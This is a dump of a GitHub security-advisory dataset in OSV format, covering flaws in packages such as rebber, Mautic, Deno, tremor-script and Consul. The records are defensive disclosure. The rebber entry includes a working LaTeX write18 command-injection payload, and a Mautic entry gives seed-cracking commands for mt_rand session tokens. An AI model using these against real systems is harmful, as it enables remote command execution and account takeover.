schema_version
stringclasses
1 value
id
stringlengths
19
19
modified
stringlengths
20
20
published
stringlengths
20
20
withdrawn
stringlengths
20
20
aliases
stringlengths
2
20
summary
stringlengths
3
183
details
stringlengths
9
12.9k
severity
stringlengths
2
92
affected
stringlengths
84
2.74k
references
stringlengths
99
16.4k
database_specific
stringlengths
131
210
1.4.0
GHSA-2c83-wfv3-q25f
2021-09-07T14:04:47Z
2021-09-07T23:07:56Z
null
[]
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in ZMarkdown
### Impact A Remote Command Execution vulnerability was found in the rebber module, which allowed execution of arbitrary commands. The reported problem came from CodeBlocks, which could be escaped to insert malicious LaTeX. Anyone using `rebber` without sanitation of code content or a custom macro is impacted by this vulnerability. Here is an example of a Markdown content that will exploit the vulnerability: ````markdown ``` \end{CodeBlock} \immediate\write18{COMMAND > outputrce} \input{outputrce} \begin{CodeBlock}{text} ``` ```` Will insert into the generated LaTeX the result of executing `COMMAND` on the system. ### Patches The vulnerability has been patched in version 5.2.1. If impacted, you should update to this version as soon as possible. ### Workarounds It is possible to mitigate the vulnerability without upgrading by using a custom code macro. Please make sure this custom macro escapes your closing LaTeX sequence. For the example above, use: ```javascript const escaped = content.replace(new RegExp('\\\\end\\s*{CodeBlock}', 'g'), '') ``` ### For more information If you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).
[]
[{'package': {'ecosystem': 'npm', 'name': 'rebber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/zestedesavoir/zmarkdown/security/advisories/GHSA-2c83-wfv3-q25f'}, {'type': 'PACKAGE', 'url': 'https://github.com/zestedesavoir/zmarkdown'}]
{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T14:04:47Z', 'nvd_published_at': None}
1.4.0
GHSA-97pv-4338-r5vp
2021-09-07T18:05:06Z
2021-09-07T23:08:54Z
null
['CVE-2021-23439']
Cross-site Scripting in file-upload-with-preview
This affects the package file-upload-with-preview before 4.2.0. A file containing malicious JavaScript code in the name can be uploaded (a user needs to be tricked into uploading such a file).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'file-upload-with-preview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23439'}, {'type': 'WEB', 'url': 'https://github.com/johndatserakis/file-upload-with-preview/pull/40/files?file-filters%5B%5D=.js&hide-deleted-files=true%23diff-fe47b243de17419c0daa22cd785cd754baed60cf3679d3da1d6fe006f9f4a7f0R174'}, {'type': 'PACKAGE', 'url': 'https://github.com/johndatserakis/file-upload-with-preview'}, {'type': 'WEB', 'url': 'https://github.com/johndatserakis/file-upload-with-preview/blob/develop/src/file-upload-with-preview.js%23L168'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FILEUPLOADWITHPREVIEW-1579492'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T18:05:06Z', 'nvd_published_at': '2021-09-05T14:15:00Z'}
1.4.0
GHSA-x7g2-wrrp-r6h3
2023-05-01T22:18:02Z
2021-09-01T18:41:06Z
null
['CVE-2021-27913']
Use of a Broken or Risky Cryptographic Algorithm
## ✍️ Description The function mt_rand is used to generate session tokens, this function is cryptographically flawed due to its nature being one pseudorandomness, an attacker can take advantage of the cryptographically insecure nature of this function to enumerate session tokens for accounts that are not under his/her control ## 🕵️‍♂️ Proof of Concept Numerous examples and attack implementations can be found in this paper . If you're looking for a practical tool that can crack your mt_rand implementation's seed value, see this project and run the following commands in a console with php5 and OpenWall's tool installed: `root$ php -r 'mt_srand(13333337); echo mt_rand( ), "\n";'` After that, copy the output (1863134308) and execute the following commands: `root$ gcc php_mt_seed.c -o php_mt_seedroot$ ./php_mt_seed 1863134308` After waiting ~1 minute you should have a few possible seeds corresponding to their PHP versions, next to your installed PHP version you should see something akin to: seed = 0x00cb7359 = 13333337 (PHP 7.1.0+) Hey, that's your seed! ## 💥 Impact An attacker could takeover accounts at random by enumerating and using access tokens. ## 📝 References - https://openwall.com/php_mt_seedhttps://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf - https://github.com/mautic/mautic/blob/5213e320b4ef4d0c51bb84c1d46a1071e8e4f7fc/app/bundles/PointBundle/Controller/TriggerController.php#L187 - https://github.com/mautic/mautic/releases/tag/3.3.4 - https://github.com/mautic/mautic/releases/tag/4.0.0
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-x7g2-wrrp-r6h3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27913'}, {'type': 'WEB', 'url': 'https://github.com/mautic/mautic/commit/d1cad766a2de74e6c6b89d6d78c2a5f2e36ba91c'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}]
{'cwe_ids': ['CWE-327'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:02:40Z', 'nvd_published_at': '2021-08-30T16:15:00Z'}
1.4.0
GHSA-mc22-5q92-8v85
2021-09-17T17:50:18Z
2021-09-20T19:52:53Z
null
['CVE-2021-39228']
Memory Safety Issue when using patch or merge on state and assign the result back to state
### Impact This vulnerability is a memory safety Issue when using [`patch`](https://www.tremor.rs/docs/tremor-script/index#patch) or [`merge`](https://www.tremor.rs/docs/tremor-script/index#merge) on `state` and assign the result back to `state`. In this case affected versions of Tremor and the [tremor-script crate](https://crates.io/crates/tremor-script) maintains references to memory that might have been freed already. And these memory regions can be accessed by retrieving the `state`, e.g. send it over TCP or HTTP. This requires the Tremor server (or any other program using tremor-script) to execute a tremor-script script that uses the mentioned language construct. #### Details If affects the following two tremor-script language constructs: * A [Merge](https://www.tremor.rs/docs/tremor-script/index#merge) where we assign the result back to the target expression and the expression to be merged needs to reference the `event`: ``` let state = merge state of event end; ``` * A [Patch](https://www.tremor.rs/docs/tremor-script/index#patch) where we assign the result back to the target expression and the patch operations used need to reference the `event`: ``` let state = patch state of insert event.key => event.value end; ``` For constructs like this (it does not matter what it references in the expression to be merged or the patch operations) an optimization was applied to manipulate the target value in-place, instead of cloning it. Our `Value` struct, which underpins all event data in `tremor-script`, is representing strings as borrowed `beef::Cow<'lifetime, str>`, that reference the raw data `Vec<u8>` the event is based upon. We keep this raw byte-array next to the `Value` structure inside our `Event` as a self-referential struct, so we make sure that the structured `Value` and its references are valid across its whole lifetime. The optimization was considered safe as long as it was only possible to merge or patch `event` data or static data. When `state` was introduced to `tremor-script` (in version 0.7.3) a new possibility to keep `Value` data around for longer than the lifetime of an event emerged. If `event` data is merged or patched into `state` without cloning it first, it can still reference keys or values from the previous event, which will now be invalid. This allows access to those already freed regions of memory and to get their content out over the wire. ### Patches The issue has been patched in https://crates.io/crates/tremor-script/0.11.6 and https://github.com/tremor-rs/tremor-runtime/releases/tag/v0.11.6 via commit [1a2efcd](https://github.com/tremor-rs/tremor-runtime/commit/1a2efcdbe68e5e7fd0a05836ac32d2cde78a0b2e) by removing the optimization and always clone the target expression of a [Merge](https://www.tremor.rs/docs/tremor-script/index#merge) or [Patch](https://www.tremor.rs/docs/tremor-script/index#patch. ### Workarounds If an upgrade is not possible, a possible workaround is to avoid the optimization by introducing a temporary variable and not immediately reassigning to `state`: ``` let tmp = merge state of event end; let state = tmp ``` ### References The actual fix is applied in this PR: https://github.com/tremor-rs/tremor-runtime/pull/1217 ### For more information If you have any questions or comments about this advisory: * Open an issue on our repository [tremor-rs/tremor-runtime](https://github.com/tremor-rs/tremor-runtime) * Please join our discord https://chat.tremor.rs and reach out to the team.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'tremor-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.3'}, {'fixed': '0.11.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/security/advisories/GHSA-mc22-5q92-8v85'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39228'}, {'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/pull/1217'}, {'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/commit/1a2efcdbe68e5e7fd0a05836ac32d2cde78a0b2e'}, {'type': 'PACKAGE', 'url': 'https://github.com/tremor-rs/tremor-runtime'}, {'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/releases/tag/v0.11.6'}]
{'cwe_ids': ['CWE-416', 'CWE-825'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T17:50:18Z', 'nvd_published_at': '2021-09-17T14:15:00Z'}
1.4.0
GHSA-x55w-vjjp-222r
2022-08-10T23:43:58Z
2021-09-29T17:12:19Z
null
['CVE-2021-3820']
inflect vulnerable to Inefficient Regular Expression Complexity
inflect is customizable inflections for nodejs. inflect is vulnerable to Inefficient Regular Expression Complexity
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'i'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3820'}, {'type': 'WEB', 'url': 'https://github.com/pksunkara/inflect/commit/a9a0a8e9561c3487854c7cae42565d9652ec858b'}, {'type': 'PACKAGE', 'url': 'https://github.com/pksunkara/inflect'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4612b31a-072b-4f61-a916-c7e4cbc2042a'}]
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T19:27:17Z', 'nvd_published_at': '2021-09-27T13:15:00Z'}
1.4.0
GHSA-ccw8-7688-vqx4
2022-08-10T23:49:51Z
2021-09-08T20:14:48Z
null
['CVE-2021-37219']
HashiCorp Consul Privilege Escalation Vulnerability
HashiCorp Consul and Consul Enterprise 1.10.1 Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.8.15, 1.9.9 and 1.10.2.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.1'}, {'fixed': '1.10.2'}]}], 'versions': ['1.10.1']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.15'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37219'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/pull/10925'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/3357e57dac9aadabd476f7a14973e47f003c4cf0'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/473edd1764b6739e2e4610ea5dede4c2bc6009d1'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/ccf8eb1947357434eb6e66303ddab79f4c9d4103'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-22-consul-raft-rpc-privilege-escalation/29024'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}]
{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T18:12:59Z', 'nvd_published_at': '2021-09-07T12:15:00Z'}
1.4.0
GHSA-vwhc-pww7-72x6
2021-08-31T20:25:52Z
2021-09-01T18:24:05Z
null
['CVE-2021-32831']
Code Injection in total.js
Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.9'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32831'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/totaljs'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/blob/e644167d5378afdc45cb0156190349b2c07ef235/changes.txt#L11'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-066-totaljs-totaljs/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/total.js'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T20:25:52Z', 'nvd_published_at': '2021-08-30T21:15:00Z'}
1.4.0
GHSA-f3rf-v9qm-9c89
2021-08-30T18:35:42Z
2021-09-01T18:36:51Z
null
['CVE-2021-36787']
Cross-site Scripting in the femanager TYPO3 extension
The extension allows by default to upload SVG files when a logged in frontend user uploads a new profile image. This may lead to Cross-Site Scripting, when the uploaded SVG image is used as is on the website. Note: If SVG uploads are required, it is recommended to use the TYPO3 extension svg_sanitizer (added to TYPO3 core since versions 9.5.28, 10.4.18 and 11.3.0) to prevent upload of malicious SVG files or to set up a strict Content Security Policy for the destination folder of uploaded images.
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36787'}, {'type': 'WEB', 'url': 'https://github.com/in2code-de/femanager/commit/70f873c60f0e40ffd6a1300218ca368156fc1bf2'}, {'type': 'WEB', 'url': 'https://extensions.typo3.org/extension/femanager/'}, {'type': 'PACKAGE', 'url': 'https://github.com/in2code-de/femanager'}, {'type': 'WEB', 'url': 'https://github.com/in2code-de/femanager/releases/tag/6.3.1'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories/security'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-010'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165675/TYPO3-femanager-6.3.0-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2022/Jan/53'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:35:42Z', 'nvd_published_at': '2021-08-13T17:15:00Z'}
1.4.0
GHSA-8mjx-h23h-w2pg
2023-06-13T20:52:43Z
2021-09-01T18:30:44Z
null
['CVE-2021-28034']
Double free in stack_dst
Affected versions of stack_dst used a push_inner function that increased the internal length of the array and then called val.clone(). If the val.clone() call panics, the stack could drop an already dropped element or drop uninitialized memory. This issue was fixed in `2a4d538` by increasing the length of the array after elements are cloned.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'stack_dst'}, 'ecosystem_specific': {'affected_functions': ['stack_dst::StackA::push_cloned']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28034'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/issues/5'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d53809e3000f40085f2b229b6b1a33759881d'}, {'type': 'PACKAGE', 'url': 'https://github.com/thepowersgang/stack_dst-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0033.html'}]
{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:56:32Z', 'nvd_published_at': '2021-03-05T09:15:00Z'}
1.4.0
GHSA-7322-jrq4-x5hf
2021-09-29T18:04:31Z
2021-09-29T17:09:40Z
null
['CVE-2021-41106']
File reference keys leads to incorrect hashes on HMAC algorithms
### Impact Users of HMAC-based algorithms (HS256, HS384, and HS512) combined with `Lcobucci\JWT\Signer\Key\LocalFileReference` as key are having their tokens issued/validated using the file path as hashing key - instead of the contents. The HMAC hashing functions take any string as input and, since users can issue and validate tokens, people are lead to believe that everything works properly. ### Patches All versions have been patched to always load the file contents, deprecated the `Lcobucci\JWT\Signer\Key\LocalFileReference`, and suggest `Lcobucci\JWT\Signer\Key\InMemory` as the alternative. ### Workarounds Use `Lcobucci\JWT\Signer\Key\InMemory` instead of `Lcobucci\JWT\Signer\Key\LocalFileReference` to create the instances of your keys: ```diff -use Lcobucci\JWT\Signer\Key\LocalFileReference; +use Lcobucci\JWT\Signer\Key\InMemory; -$key = LocalFileReference::file(__DIR__ . '/public-key.pem'); +$key = InMemory::file(__DIR__ . '/public-key.pem'); ```
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'lcobucci/jwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'lcobucci/jwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'lcobucci/jwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41106'}, {'type': 'WEB', 'url': 'https://github.com/lcobucci/jwt/commit/8175de5b841fbe3fd97d2d49b3fc15c4ecb39a73'}, {'type': 'WEB', 'url': 'https://github.com/lcobucci/jwt/commit/c45bb8b961a8e742d8f6b88ef5ff1bd5cca5d01c'}, {'type': 'PACKAGE', 'url': 'https://github.com/lcobucci/jwt'}]
{'cwe_ids': ['CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T21:27:18Z', 'nvd_published_at': '2021-09-28T21:15:00Z'}
1.4.0
GHSA-xpwj-7v8q-mcgj
2022-08-11T16:54:03Z
2021-09-23T23:18:03Z
null
['CVE-2021-32619']
Deno's static imports inside dynamically imported modules do not adhere to permission checks
### Impact Modules that are dynamically imported through `import()` or `new Worker` might have been able to bypass network and file system permission checks when statically importing other modules. In Deno 1.5.x and 1.6.x only programs dynamically importing (especially transitively) untrusted code are affected. In Deno 1.7.x all programs importing (especially transitively) untrusted code are affected. In effect an attacker in control of a (possibly remote) module in a programs module graph has been able to, **irrespective of permissions**: 1. initiate GET requests to arbitrary URLs on the internet (including LAN) and possibly read (parts of) the contents of these resources. 2. check for existence of arbitrary paths on the file system, and possibly read (parts of) the contents of these files. In Deno 1.5.x (October 27th, 2020) and Deno 1.6.x (December 8th, 2020) the attacker module had to have been granted permissions to load dynamically through the network / fs read permission. Since Deno 1.7.x (January 19th, 2021) this vulnerability was able to be exploited in a fully sandboxed isolate (without any permissions). This vulnerability was not present in releases prior to 1.5.0. Arbitrary non-GET requests, control over request headers, or file system writes are not possible through this vulnerability. Users of the `deno_core`, `deno_runtime`, or other `deno_*` crates are not affected. This is a Deno CLI only vulnerability. We are relatively confident this was not abused in the wild, as by default Deno prints out a green "Download" message when remote imports are downloaded, and this would have caused suspicion if it occurred in the middle of a programs execution. This message can be silenced with the `--quiet` flag. ### Patches The vulnerability has been patched in Deno release 1.10.2. You can upgrade to the latest Deno version by running the `deno upgrade` command. The release is available through all official download channels. ### Workarounds There is no workaround for this issue. ### For more information If you have any questions or comments about this advisory: * Open an issue on [the issue tracker](https://github.com/denoland/deno) * Discuss on [Discord](https://discord.gg/deno)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.10.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.10.1'}}]
[{'type': 'WEB', 'url': 'https://github.com/denoland/deno/security/advisories/GHSA-xpwj-7v8q-mcgj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32619'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}]
{'cwe_ids': ['CWE-285', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-23T21:13:15Z', 'nvd_published_at': '2021-05-28T21:15:00Z'}
1.4.0
GHSA-468q-v4jj-485h
2021-09-20T20:00:02Z
2021-09-20T20:09:59Z
null
['CVE-2021-3804']
Inefficient Regular Expression Complexity in taro
taro is vulnerable to Inefficient Regular Expression Complexity
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': '@tarojs/helper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.9'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3804'}, {'type': 'WEB', 'url': 'https://github.com/nervjs/taro/commit/acadb6c826ba57f2030a626f1de4f7b4608fcdb5'}, {'type': 'PACKAGE', 'url': 'https://github.com/nervjs/taro'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0ebe85e6-cc85-42b8-957e-18d8df277414'}]
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-20T20:00:02Z', 'nvd_published_at': '2021-09-17T07:15:00Z'}
1.4.0
GHSA-xm9m-2vj8-fmfr
2021-08-30T21:56:39Z
2021-09-01T18:30:40Z
null
['CVE-2021-28029']
Uninitialized memory access in toodee
An issue was discovered in the toodee crate before 0.3.0 for Rust. The row-insertion feature allows attackers to read the contents of uninitialized memory locations.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'toodee'}, 'ecosystem_specific': {'affected_functions': ['toodee::TooDee::insert_row']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28029'}, {'type': 'WEB', 'url': 'https://github.com/antonmarsden/toodee/issues/13'}, {'type': 'PACKAGE', 'url': 'https://github.com/antonmarsden/toodee'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0028.html'}]
{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:56:39Z', 'nvd_published_at': '2021-03-05T09:15:00Z'}
1.4.0
GHSA-q897-9jxf-jg9r
2021-09-20T20:18:29Z
2021-09-10T17:56:23Z
null
['CVE-2021-37579']
Security check skip in Apache Dubbo
The Dubbo Provider will check the incoming request and the corresponding serialization type of this request meet the configuration set by the server. But there's an exception that the attacker can use to skip the security check (when enabled) and reaching a deserialization operation with native java serialization. Apache Dubbo 2.7.13, 3.0.2 fixed this issue by quickly fail when any unrecognized request was found.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37579'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r898afa109cdbb4b79724308648ff0718152ebe1d3d6dfc7202d958bc%40%3Cdev.dubbo.apache.org%3E'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-10T16:49:29Z', 'nvd_published_at': '2021-09-09T08:15:00Z'}
1.4.0
GHSA-72hm-fx78-xwhc
2021-08-30T18:05:52Z
2021-09-01T18:40:40Z
null
['CVE-2021-27911']
XSS vulnerability on contacts view
### Impact Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack through the contact's first or last name and triggered when viewing a contact's details page then clicking on the action drop down and hovering over the Campaigns button. Contact first and last name can be populated from different sources such as UI, API, 3rd party syncing, forms, etc. ### Patches Upgrade to 3.3.4 or 4.0.0 ### Workarounds No ### References https://github.com/mautic/mautic/releases/tag/3.3.4 https://github.com/mautic/mautic/releases/tag/4.0.0 ### For more information If you have any questions or comments about this advisory: * Email us at [security@mautic.org](mailto:security@mautic.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-72hm-fx78-xwhc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27911'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:05:52Z', 'nvd_published_at': '2021-08-30T16:15:00Z'}
1.4.0
GHSA-grg4-wf29-r9vv
2022-02-08T20:39:51Z
2021-09-09T17:11:21Z
null
['CVE-2021-37136']
Bzip2Decoder doesn't allow setting size restrictions for decompressed data
### Impact The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack ### Workarounds No workarounds other than not using the `Bzip2Decoder` ### References Relevant code areas: https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
